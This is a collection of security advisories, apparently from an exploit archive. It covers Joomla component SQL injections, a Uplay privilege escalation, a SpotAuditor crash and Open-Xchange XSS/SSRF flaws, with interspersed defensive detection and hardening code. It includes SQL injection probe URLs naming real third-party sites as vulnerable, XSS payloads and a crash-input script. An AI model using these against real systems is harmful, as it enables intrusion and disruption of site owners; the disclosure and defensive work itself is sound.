# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################


Joomla Mad4Joomla 1.1.x SQL Injection


Joomla Mad4Joomla component version 1.1.x suffers from a remote SQL injection vulnerability.


MD5 | c4ab365d33d5eb7987b86c88aa74ff16

###################################################################

# Exploit Title : Joomla 1.5.26 Mad4Joomla 1.1.x SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/10/2019
# Vendor Homepage : mad4media.de
# Joomla Affected Versions : 1.5.16/1.5.18-1.5.26
# Software Affected Versions : 1.1.1 - 1.1.2 - 1.1.3 - 1.1.4 - 1.1.5 - 1.1.6 - 1.1.7 - 1.1.8.1
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Joomla Mad4Joomla is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in the application's database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_mad4joomla&jid=[SQL Injection]

/index.php?option=com_mad4joomla&jid=[ID-NUMBER]&Itemid=[SQL Injection]&lang=fr

###################################################################

# Example Vulnerable Sites :
*************************
[+] cardliberia.org/index.php?option=com_mad4joomla&jid=1&Itemid=1%27&lang=fr

###################################################################

# Example SQL Database Error :
****************************
No valid database connection Table 'c695_card_prd.jos_m4j_forms' doesn't exist
SQL=SELECT question_width as left_col, answer_width as right_col, use_help
FROM jos_m4j_forms WHERE fid = ''

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################

Joomla Google Maps 1.0.4 SQL Injection


Joomla Google Maps component version 1.0.4 suffers from a remote SQL injection vulnerability.


MD5 | c08e2dffdec234b2af6adbb873e947bb

###################################################################

# Exploit Title : Joomla 1.5.26 Google Maps 1.0.4 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/10/2019
# Vendor Homepage : mapdemo.110mb.com - joomla.org
# Joomla Affected Version : 1.5.16 and 1.5.26
# Software Affected Version : 1.0.4
# Owner of the Script : Lanari
# Script Owner E-Mail Address : joomla@unlimitedmail.org
# /administrator/components/com_google_maps/com_google_maps.xml
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Joomla Google Maps is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in the application's database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/index.php?category=&zipcode=[ID-NUMBER]&option=com_google_maps&Itemid=[SQL Injection]&reftype=fr

/index2.php?option=com_google_maps&Itemid=[ID-NUMBER]&reftype=fr&print=[SQL Injection]

###################################################################

# Example Vulnerable Sites :
*************************
[+] valab.com/index.php?category=&zipcode=22&option=com_google_maps&Itemid=1%27&reftype=fr

###################################################################

# Example SQL Database Error :
****************************
No valid database connection Table 'valab_bdd.val_detailChamps'
doesn't exist SQL=SELECT * FROM `val_detailChamps` where raccoursis='PRIVE'

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################

Joomla MisterEstate 1.5.26 SQL Injection


Joomla MisterEstate component version 1.5.26 suffers from a remote SQL injection vulnerability.


MD5 | 25a29ba3a84ded5f6f5c26314671e892

###################################################################

# Exploit Title : Joomla MisterEstate 1.5.26 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/10/2019
# Vendor Homepage : misterestate.com
# Affected Versions : 1.5.12/1.5.14/1.5.16/1.5.18/1.5.26
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Joomla MisterEstate is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in the application's database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_misterestate&view=search&task=showMESR&Itemid=[SQL Injection]&lang=en

###################################################################

# Example Vulnerable Sites :
*************************
[+] sabatinimmobiliare.com/index.php?option=com_misterestate&view=search&task=showMESR&Itemid=3%27&lang=en

[+] villeecasalinetwork.com/index.php?option=com_misterestate&view=search&task=showMESR&Itemid=3%27&lang=en

###################################################################

# Example SQL Database Error :
****************************
No valid database connection You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to use near 'LIMIT
0,25' at line 1 SQL=SELECT * FROM jos_misterestate WHERE LIMIT 0,25

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################

Joomla MediaLibrary 1.5.26 SQL Injection

Joomla MediaLibrary component version 1.5.26 suffers from a remote SQL injection vulnerability.


MD5 | 72926d1f1ef5e9f47f2668c39ecaa20d

###################################################################

# Exploit Title : Joomla MediaLibrary 1.5.26 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/10/2019
# Vendor Homepage : ordasoft.com
# Software Information Link : ordasoft.com/media-library-joomla-extension
# Software Affected Versions : 1.0 - 4.0.12
# Joomla Affected Versions : 1.5.16/1.5.18-1.5.26
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Joomla MediaLibrary is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in the application's database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_medialibrary&task=view&id=[ID-NUMBER]&catid=[ID-NUMBER]&Itemid=[SQL Injection]&lang=en

###################################################################

# Example Vulnerable Sites :
*************************
[+] caachen.de/index.php?option=com_medialibrary&task=view&id=98&catid=89&Itemid=1%27&lang=en

###################################################################

# Example SQL Database Error :
****************************
No valid database connection Table 'caachen_de_joomla
.jos_medialibrary_review' doesn't exist SQL=SELECT id FROM
jos_medialibrary_review WHERE fk_mediaid='98' ORDER BY id

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################

Joomla Vemod News Mailer 1.0 SQL Injection

Joomla Vemod News Mailer component version 1.0 suffers from a remote SQL injection vulnerability.


MD5 | c0c8e0945de5789a06c7226c78e30c9e

###################################################################

# Exploit Title : Joomla Vemod News Mailer 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/10/2019
# Vendor Homepage : vemod.unimatrix.net
# Software Affected Version : 1.0 - 1.5
/administrator/components/com_vemod_news_mailer/versioncompat.php
/administrator/components/com_vemod_news_mailer/toolbar.vemod_news_mailer.php
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Joomla Vemod News Mailer is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in the application's database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_vemod_news_mailer&Itemid=[ID-NUMBER]&unsubscribeall=[ID-NUMBER]&userid=[SQL Injection]

###################################################################

# Example Vulnerable Sites :
*************************
[+] labatut-riviere.fr/index.php?option=com_vemod_news_mailer&Itemid=130&unsubscribeall=1&userid=1%27

###################################################################

# Example SQL Database Error :
****************************
No valid database connection Invalid utf8 character string: '\xAE'
SQL=SELECT * FROM jos_users WHERE id= LIMIT 1

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################

Joomla Sumoku 3.9.8 SQL Injection

Joomla Sumoku component version 3.9.8 suffers from a remote SQL injection vulnerability.


MD5 | 6b404f4910508500317b2b2aab0c600b

##################################################################

# Exploit Title : Joomla Sumoku 3.9.8 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/10/2019
# Vendor Homepage : blueorangegames.com/sumoku/
# Affected Version : 3.9.8
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Joomla Sumoku is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in the application's database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/sumoku/index.php?option=com_sumoku&Itemid=[SQL Injection]&lang=fr

###################################################################

# Example Vulnerable Sites :
*************************
[+] blueorangegames.com/sumoku/index.php?option=com_sumoku&Itemid=1%27&lang=fr

###################################################################

# Example SQL Database Error :
****************************
No valid database connection You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use
near '' at line 3 SQL=SELECT a.* FROM jossumoku_sumoku AS a WHERE
a.published = 1 AND a.id =

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################
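
The five Joomla advisories above share one shape: an integer parameter (Itemid, print, userid) is concatenated into a query, and a single quote (%27) is enough to surface a database error. The component-side fix is to cast such parameters to an integer before they reach the query (Joomla 1.5 exposes JRequest::getInt for that); on the operations side the probes are easy to spot in web server access logs. The Python script below is an added example written for this page, not code from the advisories or from Joomla; it generalises the five cases to any configured set of numeric parameters. The parameter list, the log format regex and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request parameters the affected components use as integer keys; the advisories
# show each of them reached with a stray quote (Itemid=1%27, userid=1%27, print=...).
# Constructed list: extend it per deployment.
NUMERIC_PARAMS = {"Itemid", "print", "userid", "id", "catid", "zipcode"}

# Apache/Nginx combined log format, only the fields needed here (constructed regex).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_params(target):
    """Return (name, decoded value) pairs for numeric parameters whose value is not a plain integer."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+", value):
            hits.append((name, value))
    return hits


def scan_log(lines):
    """One finding per request that carries a non-numeric value in a numeric parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "status": m.group("status"),
                "params": hits,
            })
    return findings


# Constructed sample lines modelled on the request shapes in the advisories above.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Oct/2019:10:01:02 +0000] "GET /index.php?option=com_misterestate'
    '&view=search&task=showMESR&Itemid=3%27&lang=en HTTP/1.1" 500 812',
    '203.0.113.5 - - [12/Oct/2019:10:01:03 +0000] "GET /index.php?option=com_misterestate'
    '&view=search&task=showMESR&Itemid=3&lang=en HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Oct/2019:10:02:10 +0000] "GET /index.php?option=com_vemod_news_mailer'
    '&Itemid=130&unsubscribeall=1&userid=1%27 HTTP/1.1" 500 640',
    '198.51.100.7 - - [12/Oct/2019:10:02:11 +0000] "GET /index.php?option=com_medialibrary'
    '&task=view&id=98&catid=89&Itemid=1&lang=en HTTP/1.1" 200 7000',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A quoted value in Itemid is not proof of exploitation on its own; correlate the finding with a 500 response or with the "No valid database connection" strings the advisories quote if application error logs are available, and treat repeated hits from one client as a scan.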

Uplay 92.0.0.6280 Local Privilege Escalation

Uplay version 92.0.0.6280 suffers from a local privilege escalation vulnerability.


MD5 | ea5c9317378eaa521cf89c8d29612e31

# Exploit Title: Uplay 92.0.0.6280 - Local Privilege Escalation
# Date: 2019-08-07
# Exploit Author: Kusol Watchara-Apanukorn, Pongtorn Angsuchotmetee, Manich Koomsusi
# Vendor Homepage: https://uplay.ubisoft.com/
# Version: 92.0.0.6280
# Tested on: Windows 10 x64
# CVE : N/A

# Vulnerability Description: "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher" has insecure permissions
# that grant every member of BUILTIN\Users full control (F). An attacker can replace the
# vulnerable executable with a malicious file.

///////////////////////
Proof of Concept
///////////////////////

C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher"
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher BUILTIN\Users:(F)
BUILTIN\Users:(OI)(CI)(IO)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)




Vulnerability Disclosure Timeline:
==================================
07 Aug, 19 : Found Vulnerability
07 Aug, 19 : Vendor Notification
14 Aug, 19 : Vendor Response
18 Sep, 19 : Vendor Fixed
18 Sep, 19 : Vendor released new patch
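
The icacls listing above is the whole finding: an explicit, non-inherited (F) for BUILTIN\Users on a directory under Program Files. Auditing for that condition across a fleet is a parsing problem, so here is an added Python example (not from the advisory) that parses icacls output for one path and flags ACEs granting a low-privileged identity write-capable rights. The sample output is transcribed from the advisory; the identity and rights sets, and the audit_directory helper that shells out to icacls on a live Windows host, are my assumptions.

```python
import re
import subprocess

# Identities every local user effectively holds; write access for them on a
# program directory is the condition the Uplay advisory describes (assumed set).
LOW_PRIV_IDENTITIES = {
    "BUILTIN\\Users",
    "Everyone",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
}

# icacls rights that let a principal replace or modify files: full, modify, write,
# delete, delete child, write data/add file, append/add subdir, write DAC, write
# owner, generic write, generic all (assumed set).
WRITE_RIGHTS = {"F", "M", "W", "D", "DE", "DC", "WD", "AD", "WDAC", "WO", "GW", "GA"}

# One ACE as icacls prints it: <identity>:(flag)(flag)...  Identities may contain spaces.
ACE_RE = re.compile(r"(?P<who>.+?):(?P<rights>(?:\([^)]+\))+)")


def parse_icacls(output, path):
    """Return [(identity, [flags...]), ...] from `icacls <path>` output for one path."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):              # first line carries the path itself
            line = line[len(path):].strip()
        m = ACE_RE.fullmatch(line)
        if not m:
            continue
        flags = [f for group in re.findall(r"\(([^)]+)\)", m.group("rights"))
                 for f in group.split(",")]    # "(GR,GE)" holds two flags
        aces.append((m.group("who"), flags))
    return aces


def weak_aces(aces):
    """ACEs that give a low-privileged identity write-capable rights."""
    return [(who, flags) for who, flags in aces
            if who in LOW_PRIV_IDENTITIES and set(flags) & WRITE_RIGHTS]


def audit_directory(path):
    """Run icacls on a live Windows host and report weak ACEs (not used by the offline sample)."""
    out = subprocess.run(["icacls", path], capture_output=True, text=True, check=True).stdout
    return weak_aces(parse_icacls(out, path))


UPLAY_DIR = r"C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher"

# Sample transcribed from the advisory's icacls output above.
SAMPLE_ICACLS = r"""C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher BUILTIN\Users:(F)
    BUILTIN\Users:(OI)(CI)(IO)(F)
    NT SERVICE\TrustedInstaller:(I)(F)
    NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
    NT AUTHORITY\SYSTEM:(I)(F)
    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
    BUILTIN\Administrators:(I)(F)
    BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
    BUILTIN\Users:(I)(RX)
    BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
    CREATOR OWNER:(I)(OI)(CI)(IO)(F)
    APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
    APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
    APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
    APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for who, flags in weak_aces(parse_icacls(SAMPLE_ICACLS, UPLAY_DIR)):
        inherited = "inherited" if "I" in flags else "explicit"
        print(f"{who}: ({')('.join(flags)}) [{inherited}]")
```

The two hits on the sample are the explicit (non-inherited) BUILTIN\Users entries; the inherited (RX) and (GR,GE) entries are the Program Files defaults and are not reported. The remediation is to reset the directory to those defaults and re-run the audit until no explicit write ACE for a low-privileged identity remains.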


SpotAuditor 5.3.1.0 Denial Of Service

SpotAuditor version 5.3.1.0 suffers from a denial of service vulnerability.


MD5 | 6076aa4d87b9eeb347fb0c934c5fbc2f

# Exploit Title: SpotAuditor 5.3.1.0 - Denial of Service
# Author: Sanjana Shetty
# Date: 2019-10-13
# Version: SpotAuditor 5.3.1.0
# Vendor Homepage: http://www.nsauditor.com
# Software link: http://spotauditor.nsauditor.com/


# <POC by Sanjana Shetty>
# Steps

[1] Install the SpotAuditor software

[2] Access the register functionality

[3] In the name field, enter 5000 A's and press Enter; this will crash the application.

==== Use the script below to write 5000 A's to a text file, then copy its content into the name field ============


print("# POC by sanjana shetty")

try:
    # 5000 'A' (0x41) characters, written to file.txt for pasting into the name field
    with open("file.txt", "w") as f:
        junk = "\x41" * 5000
        f.write(junk)
    print("done")

except Exception as e:
    print("#error - " + str(e))

Open-Xchange OX App Suite SSRF / XSS / Information Disclosure / Access Controls

Various Open-Xchange OX App Suite versions suffer from server-side request forgery, cross site scripting, information disclosure, and improper access control vulnerabilities.


MD5 | bfbf59df0658a611dc03b03bbb86a669

Dear subscribers,

We're sharing our latest advisory with you and would like to thank everyone who contributed to finding and solving these vulnerabilities. Feel free to join our bug bounty programs (appsuite, dovecot, powerdns) at HackerOne.

Yours sincerely,
Martin Heiland, Open-Xchange GmbH



Product: OX App Suite
Vendor: OX Software GmbH

Internal reference: 66094 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.1 and 7.10.2
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.0-rev33, 7.10.1-rev17, 7.10.2-rev9
Vendor notification: 2019-07-08
Solution date: 2019-08-09
Public disclosure: 2019-10-09
Researcher Credits: mantis
CVE reference: CVE-2019-14225
CVSS: 6.4 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L)

Vulnerability Details:
The subscription mechanism for external iCal event sources follows HTTP redirection codes.

Risk:
Requests can be redirected to internal network targets if the attacker controls and injects redirect codes from the supposed iCal event source. Checking the content of the returned errors and their timing makes it possible to gather information about internal network topology and services. This can be used as a reconnaissance pattern for further attacks.

Steps to reproduce:
1. Create a webservice that redirects HTTP requests to internal hosts
2. Configure that webservice as target of "external calendar" sources
3. Check response patterns when altering the redirection target

Solution:
We disabled HTTP redirection at the responsible HTTP client component.


---


Internal reference: 66081 (Bug ID)
Vulnerability type: Cross-site scripting (CWE-80)
Vulnerable version: 7.10.1 and 7.10.2
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.0-rev30, 7.10.1-rev16, 7.10.2-rev7
Vendor notification: 2019-07-08
Solution date: 2019-08-09
Public disclosure: 2019-10-09
Researcher Credits: Manas Gupta
CVE reference: CVE-2019-14227
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

Vulnerability Details:
Calendar print view (for week, months) executes script code that is part of an appointment's title.

Risk:
Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). For this to work an attacker needs to inject a malicious appointment into the victim's calendar first, for example through a seemingly legitimate calendar invite or by being part of the same context.

Steps to reproduce:
1. Create an appointment with script code fragments as title
2. Open "View" -> "Print" at a calendar view and cancel the native print dialog

Proof of concept:
<iframe/onMouseOver="document.location.href='https://example.com/ox.png'">

Solution:
We fixed the template engine's escaping routines.


---


Internal reference: 66025 (Bug ID)
Vulnerability type: Cross-site scripting (CWE-80)
Vulnerable version: 7.10.1 and 7.10.2
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.1-rev16, 7.10.2-rev7
Vendor notification: 2019-07-04
Solution date: 2019-07-30
Public disclosure: 2019-10-09
Researcher Credits: Michael Medvedev
CVE reference: CVE-2019-14227
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

Vulnerability Details:
Appointment dialogs contain a folder selector which is not properly escaping folder names.

Risk:
Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). For this to work an attacker needs to modify a calendar folder within the same context or trick the user into doing so.

Steps to reproduce:
1. Change a calendar folder to contain script code (or change the user's name accordingly)
2. Edit or create a new appointment

Proof of concept:
ayb"><img src=x onerror=alert(document.domain)>

Solution:
We now escape folder names at this part of the dialog.


---


Internal reference: 65805 (Bug ID)
Vulnerability type: Information Exposure (CWE-200)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev60, 7.10.0-rev33, 7.10.1-rev17, 7.10.2-rev9
Vendor notification: 2019-06-24
Solution date: 2019-08-09
Public disclosure: 2019-10-09
Researcher Credits: hd7exploit
CVE reference: CVE-2019-14226
CVSS: 3.1 (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)

Vulnerability Details:
Information about external sharing URLs is provided to users that have non-administrative permissions to a folder.

Risk:
Other users could discover sharing links and use them to keep access to a folder's content even though permissions have been revoked for them at a later point in time.

Steps to reproduce:
1. As User A, create a sharing link for a folder (e.g. Calendar) and invite internal User B with "Viewer" permissions
2. As User B, check the responses of "folder?action=get" for shared folders

Proof of concept:
The response contains a "share_url" parameter

Solution:
We removed the parameter from API responses for users that don't have access to modify it (administrative permissions).


---


Internal reference: 65799 (Bug ID)
Vulnerability type: Improper Access Control (CWE-284)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev60, 7.10.0-rev33, 7.10.1-rev17, 7.10.2-rev9
Vendor notification: 2019-06-24
Solution date: 2019-08-09
Public disclosure: 2019-10-09
Researcher Credits: hd7exploit
CVE reference: CVE-2019-14226
CVSS: 3.1 (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N)

Vulnerability Details:
The attachment API allows adding attachments to tasks which are marked as "private" by their owner, in case the other user has permission to the task folder.

Risk:
Other users could unexpectedly add (malicious) content to tasks. Creators of those "private" tasks would not expect other users to be able to do so as those users are unable to access the task.

Steps to reproduce:
1. As User A, create "private" task and share the containing folder to User B
2. As User B, iterate through task IDs and try to attach files

Proof of concept:
The "attachment?action=attach" call allows adding attachments to tasks that are marked as "private" and not available to the user.

Solution:
We improved permission handling for the attachment API when dealing with "private" tasks.


---


Internal reference: 65722 (Bug ID)
Vulnerability type: Improper Access Control (CWE-284)
Vulnerable version: 7.10.1 and 7.10.2
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.0-rev33, 7.10.1-rev17, 7.10.2-rev9
Vendor notification: 2019-06-18
Solution date: 2019-08-09
Public disclosure: 2019-10-09
Researcher Credits: hd7exploit
CVE reference: CVE-2019-14226
CVSS: 2.2 (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N)

Vulnerability Details:
The API allows changing the visibility of appointments within shared folders, even though the user interface does not provide that option.

Risk:
Users other than the creator might change appointment visibility, which is unexpected. This is more of a cosmetic issue as it requires elevated permissions.

Steps to reproduce:
1. As User A, create an appointment and share the containing folder to User B with "author" permissions
2. As User B, modify the appointment's visibility through API calls

Proof of concept:
Call "chronos?action=update" for an appointment created by User A and set the "class" parameter to "PRIVATE".

Solution:
We adjusted API handling to prevent users other than the creator of an appointment from modifying its visibility.


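Entry 66094 (CVE-2019-14225) in the advisory above was fixed by disabling redirects in the HTTP client. As an added example (not Open-Xchange's code), the Python below shows what a server-side fetcher for user-supplied calendar URLs needs: a redirect handler that refuses 3xx responses, and a pre-flight check that the host does not map to a loopback, private or link-local address. Everything here is assumed: the function names, the resolver injection (so the checks can be exercised offline), and the sample hostnames and addresses.

```python
import ipaddress
import socket
import urllib.request
from urllib.parse import urlsplit


class RedirectRefused(Exception):
    """Raised when the remote iCal source answers with a 3xx."""


class NoRedirectHandler(urllib.request.HTTPRedirectHandler):
    """Refuse every redirect instead of following it; a subclass passed to
    build_opener replaces the default handler that would follow them."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        raise RedirectRefused(f"refusing HTTP {code} redirect to {newurl}")


def resolve_all(host):
    """Default resolver: every address the name maps to, so a record pointing inside is caught."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_address(addr):
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(addr)
    return ip.is_global and not (ip.is_private or ip.is_loopback
                                 or ip.is_link_local or ip.is_multicast)


def check_ical_url(url, resolver=resolve_all):
    """Validate a user-supplied iCal source URL; return it, or raise ValueError with the reason."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("only http(s) sources are allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    if parts.username or parts.password:
        raise ValueError("credentials in the URL are not allowed")
    try:                                   # IP literal: check it directly
        addrs = {str(ipaddress.ip_address(host))}
    except ValueError:                     # hostname: check everything it resolves to
        addrs = resolver(host)
    for addr in addrs:
        if not is_public_address(addr):
            raise ValueError(f"{host} maps to non-public address {addr}")
    return url


def fetch_ical(url, resolver=resolve_all, timeout=10):
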